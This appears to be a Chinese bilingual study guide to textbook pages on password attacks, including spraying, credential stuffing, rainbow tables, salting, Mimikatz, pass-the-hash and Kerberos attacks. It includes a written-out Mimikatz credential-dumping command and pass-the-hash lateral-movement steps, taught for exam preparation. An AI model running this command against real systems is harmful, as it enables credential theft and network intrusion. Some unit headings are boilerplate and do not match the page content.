哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 40 / PDF P1007

第 1007 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

With enough time, attackers can discover any hashed password using an offline brute-force attack. However, longer passwords result in sufficiently longer times, making it infeasible for attackers to crack them. Spraying Attack A spraying attack is a special type of brute-force attack. Attackers use spraying attacks in online password attacks, attempting to bypass account lockout security controls. Usually, a system will lock out an account if the same user enters the wrong password too many times within a short amount of time, such as 30 minutes. In a spraying attack, a program uses the same guessed password but loops through a list of different accounts and different systems.

When it finishes the list, it picks another password and loops through the list again. The list is long, and it typically takes the program as long as 15 to 30 minutes to loop through it. Imagine the lockout policy locks out an account if the same account tries the wrong password five times within 30 minutes and the spraying attack loops through the list in 15 minutes. After entering the incorrect password twice (30 minutes), the 30-minute timer resets. The account will not be locked out. Credential Stuffing Attack Credential stuffing is sometimes confused with password spraying, but the two attacks are different.

Password spraying attempts to bypass account lockout policies, whereas credential stuffing only checks a single username and password on each site. Imagine that Gus has hundreds of accounts on various sites such as eBay, Netflix, and Disney+. He's become overwhelmed with tracking all of these credentials, so he uses the same credentials on every site. Later, one of these sites is the victim of an attack. Malicious actors download the credential database and discover all of the usernames and passwords in an offline attack, including Gus's credentials. They then use an automated tool to try Gus's credentials on hundreds of sites (or more).

If people use different passwords on all sites, a credential stuffing attack will fail. However, many people continue to use the same credentials on multiple

中文直译 / 整理

只要有足够的时间,攻击者可以使用离线暴力破解方法破解任何哈希密 码。 然而,较长的密码会显著延长破解时间,使得攻击者无法破解它们。 喷洒攻击 一种喷洒攻击是一种特殊的暴力攻击。 攻击者在在线密码攻击中使用喷洒 攻击,试图绕过账户锁定安全控制。 通常,如果同一用户在短时间内(例如30分钟内)多次输入错误密码,系统会 锁定该账户。 在喷洒攻击中,程序使用同一个猜测的密码,但遍历一组不同的 账户和不同系统。 当完成一轮遍历后,程序会选择另一个密码并再次遍历该列 表。 该列表很长,程序通常需要15到30分钟才能完成一轮遍历。 假设锁定策略规定,如果同一账户在30分钟内尝试错误密码五次,则锁定该账 户,而喷洒攻击在15分钟内完成列表遍历。 在输入两次错误密码(耗时30分钟) 后,30分钟计时器重置,账户不会被锁定。 凭据填充攻击 凭据填充有时会被误认为是密码喷洒,但这两种攻击是不同的。 密码喷洒旨 在绕过账户锁定策略,而凭据填充仅在每个站点上检查单个用户名和密码。 想象一下,Gus 在诸如 eBay、Netflix 和 Disney+ 等多个网站上拥有数百个 账户。

他因追踪所有这些凭据而感到不堪重负,因此在每个网站上都使用相同 的凭据。 后来,其中一个网站遭受了攻击。 恶意行为者下载了凭据数据库,并 通过离线攻击获取了所有用户名和密码,包括 Gus 的凭据。 随后,他们使用 自动化工具尝试在数百个网站(或更多)上使用 Gus 的凭据。 如果人们在所有网站上使用不同的密码,凭据填充攻击就会失败。 然而,许多人 仍然在多个

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1007 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 41 / PDF P1008

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

sites. Birthday Attack A birthday attack focuses on finding collisions. Its name comes from a statistical phenomenon known as the birthday paradox. The birthday paradox states that if there are 23 people in a room, there is a 50 percent chance that any two of them will have the same birthday—not the same year but the same month and day, such as March 30. With February 29 in a leap year, there are only 366 possible days in a year. With 367 people in a room, you have a 100 percent chance of getting at least two people with the same birthdays. Reduce this to only 23 people in the room, and you still have a 50 percent chance that any two have the same birthday.

This is similar to finding any two passwords with the same hash. Imagine a simple, hypothetical, hashing function that could only create 366 different hashes. In that case, an attacker with a sample of only 23 hashes has a 50 percent chance of discovering two passwords that create the same hash. Hashing algorithms can create many more than 366 different hashes, but the point is that the birthday attack method doesn't need all possible hashes to see a match. From another perspective, imagine that you are one of the people in the room and you want to find someone else with the same birthday as you.

In this example, you'll need 23 people in the room to reach the same 50 percent probability of finding someone else with the same birthday. Similarly, it is possible for some tools to come up with another password that creates the same hash of a given hash. For example, if you know that the hash of the administrator account password is 1A5C7G, some tools can identify a password that will create the same hash of 1A5C7G. It isn't necessarily the same password, but if it can create the same hash, it is just as effective as the original password.

You can reduce the success of birthday attacks by using hashing algorithms with enough bits to make collisions computationally infeasible and use salts (discussed in the “Rainbow Table Attack” section next). There was a time when security experts considered MD5 (using 128 bits) to be strong enough to protect passwords. However, computing power continues to improve, and MD5 is no longer recommended as a cryptographic hash. SHA-3 (short for Secure Hash Algorithm version 3) can use as many as 512 bits and is more

中文直译 / 整理

网站。 生日攻击 一个生日攻击专注于寻找碰撞。 其名称来源于一种被称为生日悖论的统计现象。 生日悖论指出,如果一个房间里有23个人,那么其中有任意两人生日相同的 概率为50%——不是同一年,而是相同的月份和日期,例如3月30日。 考虑到闰年的2月29日,一年中只有366种可能的日期。 当房间里有367人时, 你有100%的概率至少有两个人生日相同。 而即使只减少到23人,你仍然有 50%的概率发现任意两人生日相同。 这类似于寻找任意两个具有相同哈希值的密码。 假设一个简单的、假设性的哈 希函数只能生成366种不同的哈希值。 在这种情况下,攻击者仅需23个哈希样 本,就有50%的概率发现两个能生成相同哈希值的密码。 哈希算法可以生成远 多于366种不同的哈希值,但关键在于,生日攻击方法并不需要所有可能的哈 希值就能找到匹配。 从另一个角度来看,假设你就是房间中的人之一,你想找到一个和你生日相同 的人。 在这个例子中,你需要房间中有23个人,才能达到50%的概率找到另一 个与你生日相同的人。 类似地,某些工具可能生成另一个密码,使其产生与给定哈希值相同的哈希。

例如,如果你知道管理员账户密码的哈希值是1A5C7G,一些工具可以识别出一 个能生成相同哈希值1A5C7G的密码。 它不一定是同一个密码,但如果能生成相 同的哈希值,其效果就与原始密码完全相同。 通过使用具有足够位数的哈希算法以使碰撞在计算上不可行,并使用盐值(详 见下一节“彩虹表攻击”),可以降低生日攻击的成功率。 曾经有一段时间, 安全专家认为MD5(使用128位)足以保护密码。 然而,计算能力持续提升, MD5已不再推荐作为加密哈希算法。 SHA‑3(安全哈希算法第3版的缩写)最 多可使用512位,且更

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 42 / PDF P1009

第 1009 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

collision resistant to brute-force attacks than MD5. Computing power continues to improve, so at some point, SHA-3 will be replaced with another hashing algorithm with longer hashes and/or stronger cryptology methods used to create the hash. Rainbow Table Attack It takes a long time to find a password by guessing it, hashing it, and then comparing it with a valid password hash. However, a rainbow table reduces this time by using large databases of precomputed hashes. Attackers create rainbow tables by: 1. Guessing a password 2. Hashing the guessed password 3.

Putting both the guessed password and the hash of the guessed password into the rainbow table A password cracker can then compare every hash in the rainbow table against the hash in a stolen password database file. A traditional password-cracking tool must guess the password and hash it before it can compare the hashes, which takes time. However, when using the rainbow table, the password cracker doesn't spend any time guessing and calculating hashes. It simply compares the hashes until it finds a match. This can significantly reduce the time it takes to crack a password. Many different rainbow tables are available for free download, but they are large.

For example, an MD5-based rainbow table using all four character types for an eight-character password is about 460 gigabytes in size. Instead of downloading these tables, many attackers create their own using tools such as rtgen (available in Kali Linux) and scripts freely available on the Internet. Many systems commonly salt passwords to reduce the effectiveness of rainbow table attacks. A salt is a group of random bits added to a password before hashing it. Cryptographic methods add the additional bits before hashing it, making it significantly more difficult for an attacker to use rainbow tables against the passwords. Argon2, bcrypt, and Password-Based

中文直译 / 整理

能抵抗暴力破解攻击。 计算能力持续提升,因此在某个时刻,SHA‑3将被另 一种具有更长哈希值和/或更强加密方法的哈希算法所取代。 彩虹表攻击 通过猜测密码、对其哈希计算,然后与有效的密码哈希值进行比较来查找密 码需要很长时间。 然而,彩虹表通过使用大型预计算哈希值数据库来缩短这 一时间。 攻击者通过以下方式创建彩虹表: 1. 猜测密码 2. 对猜测的密码进行哈希计算 3. 将猜测的密码及其哈希值 存入彩虹表 密码破解工具可以将彩虹表中的每个哈希值与被盗密码数据库文件中的哈希值 进行比较。 传统的密码破解工具必须先猜测密码并计算其哈希值,然后才能进 行比较,这需要耗费时间。 然而,使用彩虹表时,密码破解工具无需花费任何 时间进行猜测和计算哈希值,它只需直接比较哈希值,直到找到匹配项即可。 这可以显著缩短破解密码所需的时间。 有许多不同的彩虹表可供免费下载,但它们体积庞大。 例如,一个使 用全部四种字符类型、针对八位密码的基于MD5的彩虹表大小约为460吉 字节。 与其下载这些表,许多攻击者更倾向于使用工具(如rtgen,可在 Kali Linux中获取)和互联网上免费提供的脚本自行创建。

许多系统通常对密码加盐,以降低彩虹表攻击的有效性。 盐是在哈希密码前 添加的一组随机比特。 加密方法在哈希前添加这些额外的比特,使攻击者更 难以使用彩虹表破解密码。 Argon2、bcrypt和基于密码的

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1009 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

哈希本身不提供机密性;它主要用于完整性校验。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 43 / PDF P1010

第 1010 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Key Derivation Function 2 (PBKDF2) are some algorithms used to salt passwords. However, given enough time, attackers can still crack salted passwords using a brute-force attack. Adding a pepper to a salted password increases the security, making it more difficult to crack. Salts are random numbers stored in the same database holding the hashed passwords, so if an attacker gets the database, the attacker also has the salts for the passwords. A pepper is a large constant number stored elsewhere, such as a configuration value on a server or a constant stored within application code.

The practice of salting passwords was specifically introduced to thwart rainbow table attacks, but it also thwarts the effectiveness of offline dictionary and brute-force attacks. These offline attacks must calculate the hash of the guessed passwords, and if the stored passwords include salts, the attacks fail unless they also discover the salt. Again, the use of a pepper stored outside the database holding the salted, hashed passwords makes all of these attacks even more difficult. Mimikatz Benjamin Delpy released Mimikatz in 2011 to perform some experiments in Windows security while learning C. It has since become a popular tool used by attackers and penetration testers alike.

Several exploitation frameworks, such as Metasploit, include Mimikatz, and it is still maintained and updated on GitHub, a software development platform hosting open source projects. You may be wondering why we're discussing a tool created in 2011. The reason is simple—it continues to work. Part of the reason Mimikatz continues to work is that developers continue to update it. Chapter 13 discusses single sign-on (SSO) capabilities in depth. In short, SSO lets users sign on once and access other network resources without signing on again. However, SSO methods store credentials in memory, and Mimikatz exploits this by reading memory credentials.

Here are some capabilities of Mimikatz: Read Passwords from Memory Plaintext passwords and PINs stored in the Local Security Authority Subsystem Service (LSASS) process can be

中文直译 / 整理

密钥派生函数2(PBKDF2)是用于对密码加盐的一些算法。 然而,给定足够的时间,攻击者仍可通过暴力破解攻击破解加盐密码。 在加盐 密码中添加一个pepper可增强安全性,使其更难以破解。 盐值是存储在保存 哈希密码的同一数据库中的随机数,因此如果攻击者获取了数据库,他们也会 获得密码的盐值。 一个pepper是一个存储在其他地方的大常数,例如服务器上 的配置值或存储在应用程序代码中的常数。 加盐密码的做法专门用于防范彩虹表攻击,但它也能削弱离线字典攻击和暴力 破解攻击的效果。 这些离线攻击必须计算出猜测密码的哈希值,而如果存储的 密码包含盐值,则攻击会失败,除非攻击者也发现了盐值。 同样,将pepper存 储在保存加盐哈希密码的数据库之外,会使所有这些攻击变得更加困难。 Mimikatz Benjamin Delpy 于2011年发布了Mimikatz,以在学习C语言的同时对 Windows安全进行一些实验。 此后,它已成为攻击者和渗透测试人员广泛使 用的工具。 多个渗透框架,如Metasploit,都包含了Mimikatz,并且它仍在 GitHub(一个托管开源项目的软件开发平台)上持续维护和更新。

您可能在想,为什么我们要讨论一个创建于2011年的工具。 原因很简单—— 它仍在有效运行。 Mimikatz能够持续有效的一部分原因在于,开发人员仍在不 断更新它。 第13章深入讨论了单点登录(SSO)功能。 简而言之,SSO允许用户只需登录 一次,即可访问其他网络资源而无需再次登录。 然而,SSO方法会将凭证存储 在内存中,而Mimikatz正是通过读取内存中的凭证来利用这一点。 以下是Mimikatz的一些功能: 从内存中读取密码 存储在本地安全机构子系统服务(LSASS)进程中的明文密码和 PIN码可以

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1010 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

渗透测试需要书面授权、范围和规则。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
学习单元 44 / PDF P1011

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

extracted and read. For example, the sekurlsa::logonpasswords command will display the user ID and password for users currently logged on to the system. It's also possible to obtain the password hashes. Extract Kerberos Tickets Mimikatz includes a Kerberos module that can access the Kerberos API. The upcoming “Kerberos Exploitation Attack” section discusses several ticket-based attacks that are possible using Mimikatz and similar tools. Extract Certificates and Private Keys Mimikatz includes a Windows CryptoAPI module. This module can extract certificates on a system as well as the private keys associated with these certificates.

Read LM and NTLM Password Hashes in Memory Although it is possible to prevent Windows systems from storing LM hashes in the local Security Account Manager database, some Windows systems still create the hash and store it in memory. Read Cleartext Passwords in Local Security Authority Subsystem Service (LSASS) The LSASS doesn't normally store passwords in cleartext, but malware can modify the registry to enable digest authentication. Once enabled, Mimikatz can read the passwords. List Running Processes Attackers can use this capability to identify processes that they can use to pivot their attack against other targets. Attackers can run Mimikatz as fileless malware on remote systems.

One way is with a PowerShell script, such as Invoke-Mimikatz, that loads Mimikatz in memory without saving the Mimikatz files on disk. Mimikatz can then perform any of its functions on the remote computer. Although attackers and security professionals may know Mimikatz as a famous and magical tool, it isn't as well known by typical IT professionals. The danger here is that the fixes to block Mimikatz aren't implemented consistently, allowing attackers to use it frequently. Pass-the-Hash Attack A pass-the-hash (PtH) attack allows an attacker to send a captured hash of a password to an authenticating service.

Normally, the user would enter a password on the client, and the client would then create the password hash and send the hash. In this attack, the attacker doesn't need to know the actual password.

中文直译 / 整理

被提取和读取。 例如,sekurlsa::logonpasswords 命令将显示当前登录系统 的用户的用户ID和密码。 还可以获取密码哈希值。 提取 Kerberos 票据 Mimikatz 包含一个 Kerberos 模块,可访问 Kerberos API。 接下来的“Kerberos 攻击”部分将讨论使用 Mimikatz 和类 似工具可能实现的几种基于票据的攻击。 提取证书和私钥 Mimikatz 包含一个 Windows CryptoAPI 模块。 该模块可以 提取系统上的证书以及与这些证书关联的私钥。 读取内存中的 LM 和 NTLM 密码哈希 尽管可以防止 Windows 系统将 LM 哈 希存储在本地安全账户管理器数据库中,但某些 Windows 系统仍会生成哈希 并将其存储在内存中。 读取本地安全机构子系统服务 (LSASS) 中的明文密码 LSASS 通常不会以明文形 式存储密码,但恶意软件可以通过修改注册表来启用摘要身份验证。 一旦启用, Mimikatz 就可以读取这些密码。 列出正在运行的进程 攻击者可以利用此功能识别可用于向其他目标横向移动的 进程。

攻击者可以在远程系统上以无文件恶意软件的形式运行 Mimikatz。 一种方法是使用 PowerShell 脚本,例如 Invoke-Mimikatz,该脚本将 Mimikatz 加载到内存中,而无需将 Mimikatz 文件保存到磁盘。 随后,Mimikatz 可以在远程计算机上执行其任何功能。 尽管攻击者和安全专业人士可能将 Mimikatz 视为一种著名而神奇的工具, 但普通 IT 专业人员对此并不熟悉。 这里的风险在于,阻止 Mimikatz 的修 复措施并未一致实施,使得攻击者能够频繁使用它。 Pass‑the‑Hash 攻击 传递哈希(PtH)攻击允许攻击者将捕获的密码哈希发送到身份验证服务。 通 常,用户会在客户端输入密码,客户端随后生成密码哈希并发送该哈希。 在此 攻击中,攻击者无需知道实际密码。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

哈希本身不提供机密性;它主要用于完整性校验。

证书不是密钥本身,而是身份与公钥的可信绑定。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 45 / PDF P1012

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Penetration testers and attackers use Mimikatz and other tools (such as DCSync) to capture hashes, and then use the hashes to simulate the login process. They can enter the user ID and the hash into the tool and send them to an authentication server. PtH attacks are primarily associated with Windows systems using NT LAN Manager (NTLM) or Kerberos, but other systems can also be vulnerable. After attackers gain access to a single system in a network, they can then launch a PtH attack. The overall steps are as follows: 1. Use a tool such as Mimikatz to capture user hashes. These are stored in the lsass.exe process running in memory.

The Mimikatz command (entered on one line) is: "privilege::debug" "log passthehash.log" "sekurlsa::logonpasswords" If anyone with administrator privileges recently logged on, it will capture the administrator's user ID and hash. 2. The attacker then uses the credentials to authenticate. The attacker can log on as the user on the local system or remotely to an authentication server such as a domain controller in a Microsoft Active Directory (AD) domain. 3. Once logged in, the attacker can use the account to move laterally throughout the network. As a simple example, the PsExec tool can execute commands on remote systems.

Just opening the command prompt on the remote system gives the attacker the ability to run simple commands to perform more network reconnaissance. Of course, the attacker can repeat these three steps on the remote system.

中文直译 / 整理

渗透测试人员和攻击者使用Mimikatz和其他工具(如DCSync)捕获哈希, 然后利用这些哈希模拟登录过程。 他们可以将用户ID和哈希输入工具中,并将 其发送到身份验证服务器。 PtH攻击主要与使用NT LAN Manager(NTLM) 或Kerberos的Windows系统相关,但其他系统也可能存在漏洞。 攻击者在获取网络中单个系统的访问权限后,便可发起PtH攻击。 整体步骤如 下: 1. 使用Mimikatz等工具捕获用户哈希值。 这些哈希值存储在内存中运行的 lsass.exe进程内。 Mimikatz命令(单行输入)为: "privilege::debug" "log passthehash.log" " sekurlsa::logonpasswords" 如果最近有具有管理员权限的用户登录,系统将捕获管理员的用户 ID和哈希值。 2. 攻击者随后使用这些凭据进行身份验证。 攻击者可以在本地系统上以该用户身份 登录,或远程登录到身份验证 服务器,例如Microsoft Active Directory(AD)域中的域控制器。 3. 登录后,攻击者可以利用该账户在整个网络中横向移动。

作为一个简单示 例,PsExec工具可在远程系统上执行命令。 仅在远程系统上打开命令提示 符,就使攻击者能够运行简单命令以进行更多网络侦察。 当然,攻击者可以 在远程系统上重复这三个步骤。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

哈希本身不提供机密性;它主要用于完整性校验。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
身份 身份是主体在系统中的标识。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 46 / PDF P1013

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

A popular tool used in step 3 on Microsoft systems is PsExec. PsExec is part of the Sysinternals process utilities (PsTools), a free download offered by Microsoft at http://learn.microsoft.com/enus/sysinternals. PsTools is a suite of command-line utilities used to connect to remote computers. Administrators use it to access the command prompt on remote systems. They can then run any command prompt commands, list processes, reboot computers, dump event logs, and more. There are several steps administrators can take to mitigate PtH attacks. However, this is a moving target.

Attackers are continually looking at ways to bypass the mitigations, and Microsoft has been providing updates to limit PtH attacks. The best protection is to prevent the infection of the first computer. If someone is logged on to the first system with administrator privileges, it's game over. The attacker can use those privileges to access any other system in the network. However, even if an administrator has not logged on to that machine, the attacker can still move laterally through the network. By repeating the steps on every other system on the network, the attacker is sure to find one where an administrator recently logged on.

Kerberos Exploitation Attack Kerberos was discussed earlier within the context of single sign-on (SSO) in the earlier section “Implementing SSO on Internal Networks.” Microsoft's AD uses Kerberos as the primary authentication protocol. Unfortunately, Kerberos is susceptible to several exploitation attacks using open source tools such as Mimikatz. Other tools often used in Kerberos exploitation attacks are Rubeus and Impacket. Rubeus is an open source tool written in C# and used on Windows systems. Impacket is an open source collection of modules written in Python and used on Linux systems.

Kerberos exploitation attacks include the following: Overpass the Hash This is an alternative to the PtH attack used when NTLM is disabled on a network. Even if NTLM is disabled on a network,

中文直译 / 整理

在Microsoft系统上,步骤3中常用的一个工具是PsExec。 PsExec是 Sysinternals进程工具集(PsTools)的一部分,由Microsoft免费提供,下 载地址为http://learn.microsoft.com/enus/sysinternals。 PsTools是一 套命令行工具,用于连接远程计算机。 管理员使用它来访问远程系统的命令 提示符,然后可以运行任何命令提示符命令、列出进程、重启计算机、导出 事件日志等。 管理员可以采取若干措施来缓解PtH攻击。 然而,这是一项动态目标。 攻击者 不断寻找绕过这些缓解措施的方法,而微软也持续提供更新以限制PtH攻击。 最佳防护措施是防止第一台计算机被感染。 如果有人以管理员权限登录到第一台系统,那就全完了。 攻击者可以利用这些 权限访问网络中的任何其他系统。 然而,即使管理员未曾登录该机器,攻击者 仍能通过网络进行横向移动。 通过在网络上的每一台其他系统上重复这些步骤, 攻击者几乎一定能找到一台最近有管理员登录的机器。 Kerberos利用攻击 Kerberos曾在前文“在内部网络上实施单点登录”部分中作为单点登录( SSO)的背景进行讨论。

微软的AD使用Kerberos作为主要的身份验证协议。 不幸的是,Kerberos容易受到诸如Mimikatz等开源工具的多种利用攻击。 在Kerberos利用攻击中常使用的其他工具包括Rubeus和Impacket。 Rubeus是一个用C#编写的开源工具,用于Windows系统。 Impacket是一个 用Python编写的开源模块集合,用于Linux系统。 Kerberos利用攻击包括以下几种: 越过哈希 这是在网络上禁用NTLM时用于替代PtH攻击的方法。 即使网络上禁用了 NTLM,

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

